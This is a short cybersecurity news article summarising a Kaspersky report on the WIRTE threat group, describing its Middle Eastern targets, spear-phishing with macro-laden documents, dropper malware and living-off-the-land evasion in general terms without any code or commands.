Connect with us

Cyber Security

WIRTE APT Campaign Active Since 2019

Published

on

A lesser-known threat actor group named WIRTE has been found to be active since 2019. While the group is touted to have relations with the Gaza threat actor gang, the intrusion process appears to be similar to the MuddyWater group.

Who are the targets?

  • According to Kaspersky’s Securelist threat report, the threat actor has targeted a majority of industries in the Middle East. The affected entities are located in Armenia, Cyprus, Egypt, Jordan, Lebanon, Palestine, Syria, and Turkey.
  • The variety of verticals include diplomatic and financial organizations, government, law firms, military organizations, and technology companies.   

Assessing threat actor’s intrusion process

  • The initial attack process begins with spear-phishing emails written in the Arabic language, occasionally associated with Palestinian matters. 
  • These emails include documents, which if opened, cause the execution of VB script macros designed to download the payload, which in one case was named Ferocious dropper.
  • In some cases, researchers also observed a fake Kaspersky Update executable acting as a dropper for the VBS implant.

Evasion techniques modified

  • Since its inception, WIRTE modified its toolset to remain stealthy for a longer period of time.
  • Living-off-the-Land (LotL) is one such technique added recently to its toolset.
  • This suspected subgroup of Gaza cybergang had used this effective method to compromise its victims with better OpSec than its suspected counterparts.

Conclusion

It is quite interesting to note that WIRTE operators are using simple and common TTPs to stay under the radar for a long time. However, researchers indicate that this alleged new subgroup of the Gaza cybergang is likely to expand its presence in cyberspace by using updated and stealthier TTPs.

Source: https://cyware.com/news/wirte-apt-campaign-active-since-2019-058761e4

Advertisement
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

Copyright © 2023 Cyber Reports Cyber Security News All Rights Reserved Website by Top Search SEO